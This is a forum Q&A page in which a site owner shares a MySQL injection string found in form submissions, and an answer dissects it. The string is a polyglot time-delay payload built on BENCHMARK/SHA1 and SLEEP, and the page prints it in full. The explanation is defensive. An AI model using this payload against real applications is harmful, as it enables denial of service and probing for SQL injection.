CODEWITHSUNDEEP
mysqlcode-injection
Tom
Tom

Reputation: 303

who knows this sql injection?

someone injects the following content by unsing textfields in forms:

IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/

do you have an Idea, what it does? For me, it looks like a try to slow things down.

You can find a lot of injected websites (using this code) in google. I reckon there is some "super hacker script" that is used for that. It seems to use "[email protected]" as default email adress. Does somebody know that script?

Upvotes: 2

Views: 5301

Answers (1)

Jeremy Smyth
Jeremy Smyth

Reputation: 23493

It's designed to hit the CPU hard regardless of whether the input box's value is unquoted, single-quoted, or double-quoted on older versions of MySQL, and on newer versions, to sleep for 5 seconds, holding the connection open.

In each case it's likely to perform a denial-of-service attack if the application is vulnerable to SQL injection, because holding a connection open for a long time is likely to result in the server running out of resources/available connections.

-- if unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
---and then ignores the rest, which appears commented:        
/*


-- If it's single-quoted, it doesn't see the comment,
-- rather, it terminates the singlequote:
'
-- ...and then sees this: 
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
--- ...and then sees the next part as a single-quoted string terinated in the client
'|


--but if it's a double-quoted, string, it sees the end double-quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
---and then opens a doublequote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/

In each case it's attempting to benchmark an execution of the SHA1 function, which is quite CPU-intensive. BENCHMARK is simply a function that executes another expression a fixed number of times. In this case it's used to perform a CPU DOS on the host.

Upvotes: 4

Related Questions